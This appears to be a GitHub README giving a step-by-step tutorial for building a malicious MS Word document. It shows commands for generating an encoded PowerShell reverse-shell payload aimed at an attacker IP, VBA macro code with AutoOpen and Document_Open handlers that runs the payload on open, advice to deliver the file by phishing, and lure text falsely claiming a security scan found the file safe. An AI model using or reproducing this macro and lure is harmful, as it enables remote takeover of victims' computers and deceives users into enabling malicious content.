Creating-a-Malicious-doc

Creating a Malicious Macro using MS Word

View on GitHub

Creating-a-Malicious-doc

As we know that how important documents are in a company. We can create a malicious macro using MS Word which leads to create a doc file contain our malicious code, if any user open that doc file the payload triggred and attacker gets a reverse shell. Phishing is the best way to send someone a malicious document.

Exploitation

Generate a powershell base64 encoded payload using newpayloadgeneration.py

python3 newpayloadgeneration.py 192.168.x.x 443 

OnPaste 20220610-124634

Using payload.py to get Shellcode

copy that payload and paste the code on another payload.py python script, then run payload.py and get shellcode which we gonna copy and use it on MS Word macro.

OnPaste 20220610-125130

python3 payload.py

OnPaste 20220610-125234

Creating a Macro using MS Word

Now open MS Word goto View –> choose Macro –> open macro –> create a macro, name it MyMacro –> choose option Macros in: Document1(document)

OnPaste 20220610-125805

We need macro language to create a malicious macro.

Sub AutoOpen() 

MyMacro 

End Sub 

Sub Document_Open() 

MyMacro 

End Sub 

Sub MyMacro() 

    Dim Str As String 

    Str = Str + "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAt" 
    Str = Str + "AE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAF" 
    .
    .
    .
    
    
    CreateObject("Wscript.Shell").Run Str 
    
    
    End Sub 

Copy and paste that encoded shellcode as shown.

OnPaste 20220610-130325

OnPaste 20220610-130348

NOTE: I’ll give my doc name project.doc and remember to choose save type as Word 97-2003 Document.

For this to work user must click on Enable Content, in real world usually saying something along the lines of “Security product XYZ has scanned the content and deemed it to be safe.